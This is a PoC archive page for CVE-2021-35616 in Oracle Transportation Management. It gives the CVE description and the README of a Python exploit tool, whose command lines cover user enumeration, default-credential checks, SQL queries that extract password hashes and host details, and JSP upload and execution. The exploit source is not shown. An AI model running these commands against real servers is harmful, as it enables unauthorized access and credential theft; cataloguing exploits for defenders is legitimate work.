Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-35616 PoC — Oracle Transportation Management 安全漏洞

Source
https://github.com/Ofirhamam/OracleOTM
Associated Vulnerability
Title:Oracle Transportation Management 安全漏洞 (CVE-2021-35616)
Description:Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).
Description
Python tool for exploiting CVE-2021-35616
Readme
# OracleOTM
Python tool for exploiting CVE-2021-35616 


The script works in modules, which I implemented in the following order:

►	Username enumeration

►	Search for default credentials

►	Run an SQL query using DBXML servlet

►	Full exploitation and JSP execution

The syntax of the script is as follows: 

.\OracleOTM.py {module} {host TXT file} {additional parameters}



Username enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt

Search for default credentials: .\OracleOTM.py default {hosts TXT file}

Run an SQL query using DBXML servlet:	.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"


I also prepared some predefined queries that I found useful; you can access them directly, as follows:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os 

    OS – Extract the server’s OS 

    Osuser – Extract the OS user running the DB

    Hostname – DB server host name 

    Hostip – DB server IP address 

    Passwords – Extracts the OTM users and their hashed passwords

     Oraversion – The DB version 

    Dbusershash – The DB users’ password hashes

    Dbfileslocation – The location of the DB files in the OS

Full exploitation and JSP execution:	.\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →